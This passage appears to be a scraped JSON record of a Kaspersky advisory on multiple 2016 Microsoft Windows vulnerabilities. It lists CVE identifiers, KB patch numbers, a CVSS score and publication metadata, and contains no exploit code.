\n[CVE-2016-3332](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3332>) \n[CVE-2016-3333](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3333>) \n[CVE-2016-3334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3334>) \n[CVE-2016-3335](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3335>) \n[CVE-2016-3338](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3338>) \n[CVE-2016-3340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3340>) \n[CVE-2016-3342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3342>) \n[CVE-2016-3343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3343>) \n[CVE-2016-7184](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7184>) \n[CVE-2016-7205](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7205>) \n[CVE-2016-7210](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7210>) \n[CVE-2016-7212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7212>) \n[CVE-2016-7214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7214>) \n[CVE-2016-7215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7215>) \n[CVE-2016-7216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7216>) \n[CVE-2016-7217](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7217>) \n[CVE-2016-7218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7218>) \n[CVE-2016-7220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7220>) \n[CVE-2016-7221](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7221>) \n[CVE-2016-7222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7222>) \n[CVE-2016-7223](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7223>) \n[CVE-2016-7224](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7224>) \n[CVE-2016-7225](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7225>) \n[CVE-2016-7226](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7226>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2016-7202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202>)0.0Unknown \n[CVE-2016-7256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7256>)0.0Unknown \n[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>)0.0Unknown \n[CVE-2016-7248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7248>)0.0Unknown \n[CVE-2016-7247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7247>)0.0Unknown \n[CVE-2016-7246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7246>)0.0Unknown \n[CVE-2016-7238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7238>)0.0Unknown \n[CVE-2016-7237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7237>)0.0Unknown \n[CVE-2016-0026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0026>)0.0Unknown \n[CVE-2016-3332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3332>)0.0Unknown \n[CVE-2016-3333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3333>)0.0Unknown \n[CVE-2016-3334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3334>)0.0Unknown \n[CVE-2016-3335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3335>)0.0Unknown \n[CVE-2016-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3338>)0.0Unknown \n[CVE-2016-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3340>)0.0Unknown \n[CVE-2016-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3342>)0.0Unknown \n[CVE-2016-3343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3343>)0.0Unknown \n[CVE-2016-7184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7184>)0.0Unknown \n[CVE-2016-7205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7205>)0.0Unknown \n[CVE-2016-7210](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7210>)0.0Unknown \n[CVE-2016-7212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7212>)0.0Unknown \n[CVE-2016-7214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7214>)0.0Unknown \n[CVE-2016-7215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7215>)0.0Unknown \n[CVE-2016-7216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7216>)0.0Unknown \n[CVE-2016-7217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7217>)0.0Unknown \n[CVE-2016-7218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7218>)0.0Unknown \n[CVE-2016-7220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7220>)0.0Unknown \n[CVE-2016-7221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7221>)0.0Unknown \n[CVE-2016-7222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7222>)0.0Unknown \n[CVE-2016-7223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7223>)0.0Unknown \n[CVE-2016-7224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7224>)0.0Unknown \n[CVE-2016-7225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7225>)0.0Unknown \n[CVE-2016-7226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7226>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3200970](<http://support.microsoft.com/kb/3200970>) \n[3181707](<http://support.microsoft.com/kb/3181707>) \n[3193418](<http://support.microsoft.com/kb/3193418>) \n[3194371](<http://support.microsoft.com/kb/3194371>) \n[3196718](<http://support.microsoft.com/kb/3196718>) \n[3197873](<http://support.microsoft.com/kb/3197873>) \n[3197874](<http://support.microsoft.com/kb/3197874>) \n[3197876](<http://support.microsoft.com/kb/3197876>) \n[3197877](<http://support.microsoft.com/kb/3197877>) \n[3198218](<http://support.microsoft.com/kb/3198218>) \n[3198234](<http://support.microsoft.com/kb/3198234>) \n[3198483](<http://support.microsoft.com/kb/3198483>) \n[3198510](<http://support.microsoft.com/kb/3198510>) \n[3198585](<http://support.microsoft.com/kb/3198585>) \n[3198586](<http://support.microsoft.com/kb/3198586>) \n[3203859](<http://support.microsoft.com/kb/3203859>) \n[3208481](<http://support.microsoft.com/kb/3208481>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 45, "modified": "2020-07-22T00:00:00", "published": "2016-11-08T00:00:00", "id": "KLA10897", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10897", "title": "\r KLA10897Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}